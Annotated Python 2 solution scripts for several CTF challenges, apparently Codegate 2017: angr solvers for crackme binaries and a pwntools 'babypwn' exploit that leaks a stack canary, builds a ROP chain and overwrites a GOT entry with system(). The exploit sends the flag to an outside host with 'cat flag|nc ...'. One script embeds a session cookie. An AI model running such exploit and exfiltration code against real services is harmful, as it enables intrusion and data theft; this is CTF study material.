# Symbolic-execution solver (angr) for the "angrybird" crackme: start a blank
# state right after the program's own input routine, hand-build the stack frame
# with a symbolic 24-byte input, then explore until one of the `find` blocks is
# reached while pruning every `avoid` block, and print the concretised input.
# Python 2 (print statement) and the pre-8.x angr API (state.se, path_group,
# any_str); newer releases spell these state.solver, simulation_manager and
# eval(cast_to=bytes).
import angr
import claripy

# Entry address for the exploration. The name suggests the block that follows
# the fgets() call in the target — confirm against the disassembly.
fgets = 0x00000000004007D5
# Success blocks. 0x404fda is listed twice and 0x0404FAB has a stray leading
# zero; both are harmless for a tuple of ints but easy to misread.
find = (0x404fda,0x0404FAB,0x404FBC,0x404FDA,)
# Blocks to prune. A generated list (presumably every failure branch); the
# first entry, 0x4000060, lies outside the 0x40xxxx range of the rest and may
# be a typo for 0x400060 — extra entries in `avoid` do not affect correctness.
avoid = tuple([
    0x4000060,0x4007ef,0x400818,0x400838,0x400861,0x400890,0x4008b9,0x4008e2,
    0x40090b,0x400934,0x400977,0x4009a0,0x4009c9,0x4009f2,0x400a1b,0x400a47,
    0x400a6c,0x400a95,0x400abb,0x400ae0,0x400b09,0x400b3f,0x400b68,0x400ba4,
    0x400bd6,0x400bff,0x400c31,0x400c5d,0x400c82,0x400cab,0x400cd0,0x400cf5,
    0x400d1b,0x400d40,0x400d69,0x400d92,0x400db2,0x400dd7,0x400e00,0x400e26,
    0x400e52,0x400e7b,0x400eb8,0x400edd,0x400f06,0x400f2f,0x400f58,0x400f78,
    0x400fa1,0x400fd0,0x400ff5,0x40101b,0x40104b,0x401070,0x401099,0x4010c2,
    0x4010e2,0x40110b,0x401134,0x40115d,0x401186,0x4011c2,0x4011eb,0x40121b,
    0x401244,0x40126d,0x401296,0x4012bf,0x4012e8,0x40131e,0x401347,0x401373,
    0x40139c,0x4013c5,0x4013e5,0x40140e,0x401437,0x401460,0x401489,0x4014b2,
    0x4014db,0x401504,0x40152d,0x401556,0x40157f,0x4015a8,0x4015d1,0x401600,
    0x401629,0x401652,0x40167b,0x4016a4,0x4016d3,0x4016fc,0x401725,0x40177b,
    0x4017a4,0x4017cc,0x4017f5,0x40181e,0x401854,0x40187d,0x4018b3,0x4018dc,
    0x401905,0x40192e,0x401957,0x401980,0x4019a9,0x4019d2,0x4019fb,0x401a24,
    0x401a53,0x401a7c,0x401aac,0x401ad5,0x401afe,0x401b2d,0x401b56,0x401b7f,
    0x401ba4,0x401bcd,0x401bf5,0x401c2b,0x401c5a,0x401c83,0x401cac,0x401cd5,
    0x401cfe,0x401d23,0x401d49,0x401d6e,0x401d97,0x401dd3,0x401dfc,0x401e25,
    0x401e4a,0x401e70,0x401e95,0x401eba,0x401ee3,0x401f12,0x401f3b,0x401f64,
    0x401f8d,0x401fb6,0x401fdf,0x402008,0x402031,0x40205a,0x402083,0x4020a8,
    0x4020cd,0x4020f3,0x402118,0x402141,0x40216a,0x4021a0,0x4021c9,0x4021ff,
    0x402224,0x40225d,0x402283,0x4022a8,0x4022d1,0x4022fa,0x402323,0x40234c,
    0x402375,0x40239e,0x4023c3,0x4023e8,0x40240d,0x402433,0x402458,0x40248e,
    0x4024c0,0x4024fc,0x402525,0x40254a,0x40256f,0x402595,0x4025ba,0x4025e3,
    0x402640,0x402672,0x402697,0x4026c6,0x4026ef,0x40271f,0x402748,0x40277e,
    0x4027a7,0x4027cd,0x4027f2,0x40281b,0x402844,0x40286d,0x402896,0x4028bf,
    0x4028f1,0x40291a,0x402943,0x402968,0x40298d,0x4029b6,0x4029db,0x402a15,
    0x402a3a,0x402a69,0x402a92,0x402abb,0x402af1,0x402b1a,0x402b43,0x402b79,
    0x402b9e,0x402bc7,0x402bf0,0x402c15,0x402c3a,0x402c69,0x402c92,0x402cb7,
    0x402cdd,0x402d02,0x402d2b,0x402d61,0x402d8a,0x402db3,0x402dd8,0x402e01,
    0x402e2f,0x402e58,0x402e8a,0x402eaf,0x402ede,0x402f03,0x402f2c,0x402f55,
    0x402f90,0x402fb6,0x402fe8,0x403011,0x40303a,0x40305a,0x403083,0x4030ac,
    0x4030d5,0x4030fe,0x40311e,0x403154,0x40317d,0x40319d,0x4031c6,0x4031ef,
    0x403218,0x403241,0x40326a,0x403293,0x4032da,0x403307,0x403330,0x403359,
    0x403395,0x4033cb,0x4033eb,0x403414,0x40343d,0x403466,0x40348f,0x4034b8,
    0x4034e1,0x403501,0x40352a,0x403559,0x403582,0x4035ab,0x4035d4,0x40360a,
    0x40362a,0x403660,0x403689,0x4036b2,0x403702,0x40372b,0x403754,0x40378a,
    0x4037c0,0x4037e9,0x403812,0x40383b,0x403864,0x40388d,0x4038c3,0x4038f9,
    0x40392f,0x403958,0x40397d,0x4039a3,0x4039c8,0x4039f1,0x403a1a,0x403a43,
    0x403a6c,0x403a91,0x403ac0,0x403ae5,0x403b14,0x403b3d,0x403b66,0x403b8f,
    0x403bb8,0x403be1,0x403c06,0x403c2b,0x403c5a,0x403c83,0x403cac,0x403ce2,
    0x403d0b,0x403d34,0x403d5d,0x403d82,0x403da7,0x403dd6,0x403dff,0x403e28,
    0x403e51,0x403e90,0x403ed1,0x403f07,0x403f30,0x403f66,0x403f8b,0x403fb0,
    0x403fd6,0x403ffb,0x404024,0x40405a,0x404083,0x4040ac,0x4040d1,0x4040f6,
    0x40411c,0x404141,0x40416a,0x404193,0x4041c9,0x4041f2,0x404218,0x40423d,
    0x404266,0x40428f,0x4042b8,0x4042e1,0x40430a,0x40432f,0x404358,0x40437d,
    0x4043a2,0x4043d4,0x4043fa,0x40441f,0x404448,0x404471,0x40449a,0x4044c3,
    0x4044ec,0x404511,0x40453a,0x40455f,0x404584,0x4045ad,0x4045d2,0x4045f8,
    0x40461d,0x404646,0x40466f,0x404698,0x4046c1,0x4046ea,0x40470f,0x404738,
    0x40475d,0x404782,0x4047ab,0x4047d0,0x4047f5,0x40481a,0x404840,0x404865,
    0x40488e,0x4048b7,0x4048dc,0x404901,0x404930,0x404959,0x404982,0x4049ab,
    0x4049d4,0x4049fd,0x404a1d,0x404a46,0x404a6f,0x404a98,0x404ac1,0x404aea,
    0x404b0a,0x404b33,0x404b5c,0x404b85,0x404bae,0x404bd7,0x404c00,0x404c29,
    0x404c6c,0x404c95,0x404cbe,0x404ce7,0x404d10,0x404d39,0x404d6f,0x404d98,
    0x404dc1,0x404dea,0x404e13,0x404e3c,0x404e61,0x404e90,0x404eb9,0x404ee2,
    0x404f0b,0x404f30,0x404f68,0x404f9])  # last entry looks truncated in the listing
p = angr.Project('/tmp/angrybird')
# A blank state at `fgets` skips the program's own input code, which is why
# the frame is populated by hand below.
s = p.factory.blank_state(addr = fgets )
# The 24-byte input the program checks; concretised once a path is found.
serial = s.se.BVS("flag", 24*8)
# Arbitrary but fixed frame pointer; the rbp-relative slots the program reads
# are filled in relative to it.
ebp = 0x606f00
# Four unconstrained 64-bit locals at rbp-0x70 .. rbp-0x58. NOTE(review):
# the first argument of claripy.BVS is a *name*; the ints given here read like
# the addresses of the globals those locals are loaded from. Old claripy
# stringified the int, so it worked — confirm before porting.
s.memory.store(ebp-0x70, claripy.BVS(0x606018,64))
s.memory.store(ebp-0x68, claripy.BVS(0x606020,64))
s.memory.store(ebp-0x60, claripy.BVS(0x606028,64))
s.memory.store(ebp-0x58, claripy.BVS(0x606038,64))
# Input buffer assumed to live at rbp-0x50 — confirm against the frame layout.
s.memory.store(ebp-0x50, serial)
s.regs.rbp = ebp
pg = p.factory.path_group(s)
pg.explore(find = find, avoid=avoid)
pg  # no-op expression statement; presumably left over from an interactive session
# Raises IndexError when exploration found no path (pg.found is empty); the
# NUL stripping removes the unconstrained tail of the 24-byte buffer.
print pg.found[0].state.se.any_str(serial).strip("\x00")
# Python 2 / pwntools solution for the "babypwn" service (the codegate paths
# suggest Codegate 2017; host/port are the CTF's infrastructure).
# What the script relies on, from the defence side:
#   1. an over-read: the service echoes the 41 bytes sent to it, and the bytes
#      that follow the echo are the stack canary (its always-NUL low byte is
#      restored below) — a missing terminator / bounds check on the echo;
#   2. an unchecked-length copy into a 40-byte stack buffer, so the canary and
#      a ROP chain can be placed after it;
#   3. fixed code addresses (no PIE) and a writable GOT entry for send().
# A length check, PIE and full RELRO are the mitigations that remove each.
from pwn import *
e = ELF('/root/codegate/babypwn')
#l = ELF('/lib/i386-linux-gnu/libc-2.23.so')
# Remote libc build identified via libcdb; only the system-send distance is used.
l = ELF('/root/codegate/92') # libcdb.com
s = remote('110.10.212.130', 8889)
#s = remote('0',8181)
print s.recvuntil(' >')
s.sendline('1')
print s.recvuntil(':')
# Step 1: fill the buffer plus the canary's NUL byte so the echo runs on.
s.send('a'*41)
print s.recvuntil('a'*41)
# recv(4) returns *up to* 4 bytes; with '\x00' prepended this presumably yields
# exactly the 4 canary bytes — confirm against the service's actual output.
canary = u32('\x00'+s.recv(4))
print hex(canary)
s.sendline('1')
print s.recvuntil(':')
# Gadget/function addresses in the non-PIE binary. pppr is a pop;pop;pop;ret
# gadget; pppr+1 and pppr+2 enter it after one or two pops, i.e. clean up two
# or one argument respectively. c_send / c_recv are presumably in-binary
# wrappers around send()/recv() on the client socket — confirm in the disassembly.
pppr = 0x8048B83
c_send = 0x080488B1
c_recv = 0x08048907
send = 0x08048700
# Padding between the canary and the saved return address.
rop = '1'*0xc
#rop += e.symbols['mend'] + p32(pppr) + p32(
# Chain: c_send(&GOT[send]) discloses the resolved libc address of send();
# c_recv(&GOT[send], 40) then reads 40 bytes over that GOT entry; the final
# send@plt call dispatches through the overwritten entry with GOT[send]+4 as
# its first argument (the string written right after the new pointer).
rop += p32( c_send ) + p32( pppr+2 ) + p32( e.got['send'] )
rop += p32( c_recv ) + p32( pppr+1 ) + p32( e.got['send'] ) + p32(40)
rop += p32( send ) + 'AAAA' + p32( e.got['send'] + 4 )
# Step 2: buffer, intact canary, then the chain.
s.send('a'*40+p32(canary)+rop)
# Menu option 3 presumably returns from the vulnerable function and so
# triggers the chain — confirm.
s.sendline('3')
print s.recvuntil('Select menu > ')
leak_libc = u32(s.recv(4))
# Rebase system() from the leaked send() using the offsets of the identified libc.
system = leak_libc + (l.symbols['system'] - l.symbols['send'])
print 'LIBC : %x' % leak_libc
# The 40-byte write that lands on GOT[send]: new pointer, then the command.
# The command pushes the flag to an outbound host:port — exactly the egress
# connection a network monitor on the service host would flag.
cmd = 'cat flag|nc cutejinu.xyz 4999;'
s.send( p32(system) + cmd )#'ls|nc cutejinu.xyz 4999;' )
s.interactive()
# Python 2 / pwntools session against a CTF service at 110.10.212.138:19091.
# The service is driven entirely with fixed strings; nothing is computed here.
from pwn import *
s = remote('110.10.212.138', 19091)
s.recvuntil('Input >')
# Looks like a base64-encoded value (not decoded here). `sc` is used only for
# the first send; the later sends repeat the literal, the last one with '=='
# padding appended.
sc = "TjBfbTRuX2M0bDFfYWc0aW5fWTNzdDNyZDR5OigA"
s.sendline(sc)
s.recvuntil('[*] USER : ')
print s.recvuntil('Input')
s.sendline('TjBfbTRuX2M0bDFfYWc0aW5fWTNzdDNyZDR5OigA')
print s.recvuntil('Input')
s.sendline('TjBfbTRuX2M0bDFfYWc0aW5fWTNzdDNyZDR5OigA==')
# Sent without waiting for a prompt; the double quotes are part of the payload.
s.sendline('"Y2F0IGZsYWc="')
s.interactive()
# (A stray '%' followed this line in the pasted listing — a shell-prompt
# artifact, not part of the script.)
# Batch solver: for each challenge binary /tmp/n/prob<i> recover the argv[1]
# that reaches the 'Good' path with angr, then submit it to the scoring
# endpoint with curl. Python 2 (print statement, urllib2) and the pre-8.x angr
# API (factory.path, path_group, state.se.any_str).
from pwn import *
import angr
import os
import urllib2

def a(c):
    """Solve /tmp/n/prob<c> and return the argv[1] that reaches 'Good'.

    The find/avoid addresses come from objdump, driven through a pwntools
    /bin/sh process:
      - find:  address of the instruction whose disassembly line mentions
               the address of the 'Good' string;
      - avoid: find+12 (fixed offset, presumably the failure branch that
               follows — confirm) plus every `call exit@plt` site.
    Returns the solution truncated at its first NUL byte.
    Raises IndexError when angr finds no path (pg.found is empty). If either
    grep matches nothing, recvline()/recvuntil() wait for output that never
    arrives instead of failing.
    """
    path = '/tmp/n/prob%d'%c
    # A shell is used as a command runner. `path` is built from an int, so
    # there is no injection surface in these pipelines, but subprocess with an
    # argument list would avoid the shell altogether.
    s = process('/bin/sh')
    e = ELF(path)
    # First occurrence of the bytes 'Good' in the binary.
    st = '0x%x' % list(e.search('Good'))[0]
    s.sendline( "objdump --disassemble %s|grep %s|awk '{print $1}'" % (path, st) )
    res = s.recvline().strip()
    find = int( res.replace(':','') , 16 )
    # The 'END' sentinel delimits the output, since the shell prints no prompt
    # that recvuntil could key on.
    s.sendline("objdump --disassemble %s|grep \"exit@plt>\"|grep call|awk '{print $1}';echo END" % path)
    tmp = s.recvuntil('END').replace(':','').strip().replace('\nEND','').split('\n')
    avoid = [find+12,]
    for t in tmp:
        avoid.append(int(t,16))
    avoid = tuple(avoid)
    # print find
    # print avoid
    # avoid = (0x0000400DD2,0x0000400DFB)
    project = angr.Project(path, load_options={'auto_load_libs':False})
    # 100-byte symbolic argv[1]; concretised once a path is found.
    argv1 = angr.claripy.BVS("argv1",100*8)
    initial_state = project.factory.path(args=[path,argv1])
    pg = project.factory.path_group(initial_state)
    pg.explore(avoid=avoid,find=find)
    found = pg.found[0]
    solution = found.state.se.any_str(argv1)
    # NOTE(review): str.find returns -1 when there is no NUL, in which case
    # this slice silently drops the last byte rather than keeping everything.
    solution = solution[:solution.find("\x00")]
    return solution

for i in range(1,102):
# for i in [6,23,31,41,54,72,76,85,86,99,100]:
    try:
        print i
        # urllib2.quote() percent-encodes the shell- and form-significant
        # characters (quotes, ';', '|', '&', space) before the value is spliced
        # into the single-quoted --data argument below.
        t = urllib2.quote(a(i))
        print t
        # Submission via a shell string; urllib2 itself, or subprocess with an
        # argument list, would not depend on the quoting above. The Cookie
        # header carries a live session id — a secret that should not sit in a
        # script or a published writeup.
        os.system("""curl 'http://110.10.212.131:8777/auth.php' -H 'Cookie: PHPSESSID=ufccld9ve2su5t7pksvdud4215' -H 'Origin: http://110.10.212.131:8777' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.8' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Cache-Control: max-age=0' -H 'Referer: http://110.10.212.131:8777/' -H 'Connection: keep-alive' --data 'prob=%d&key=%s' --compressed"""%(i,t))
    except:
        # Bare except also swallows KeyboardInterrupt and SystemExit, and a
        # failed problem is reported only as "ERROR" with no cause attached.
        print "ERROR"